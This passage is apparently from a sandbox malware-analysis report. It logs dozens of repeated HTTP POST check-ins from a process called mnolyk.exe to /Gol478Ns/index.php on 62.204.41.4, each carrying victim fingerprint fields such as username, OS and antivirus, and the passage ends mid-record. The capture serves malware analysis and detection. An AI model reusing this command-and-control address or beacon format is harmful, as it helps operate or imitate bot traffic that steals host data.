                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.865664959 CET265INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        65192.168.2.54975562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:00.032530069 CET266OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.104228020 CET266INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        66192.168.2.54975662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:00.296701908 CET267OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.362060070 CET267INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        67192.168.2.54975762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:00.537791014 CET268OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.601149082 CET268INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        68192.168.2.54975862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:00.787103891 CET269OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.852035046 CET269INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        69192.168.2.54975962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:01.035712957 CET270OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.102294922 CET270INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.54969762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:30.331432104 CET207OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.398885965 CET208INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        70192.168.2.54976062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:01.327723980 CET271OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.400182962 CET271INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        71192.168.2.54976162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:01.580132008 CET272OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.646137953 CET272INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        72192.168.2.54976262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:01.814766884 CET273OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.886197090 CET273INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        73192.168.2.54976362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:02.065956116 CET274OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.138685942 CET274INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        74192.168.2.54976462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:02.319284916 CET275OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.385740995 CET275INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        75192.168.2.54976562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:02.563683033 CET276OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.628305912 CET276INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        76192.168.2.54976662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:02.800103903 CET277OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.870012999 CET277INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        77192.168.2.54976762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:03.053143978 CET278OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.120043039 CET278INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        78192.168.2.54976862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:03.301034927 CET279OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.366358995 CET279INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        79192.168.2.54976962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:03.541604042 CET280OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.604628086 CET280INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        8192.168.2.54969862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:30.576133013 CET208OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.639316082 CET209INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        80192.168.2.54977062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:03.784821033 CET281OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.849550009 CET281INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        81192.168.2.54977162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:04.019413948 CET282OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.084112883 CET282INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        82192.168.2.54977262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:04.254513979 CET283OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
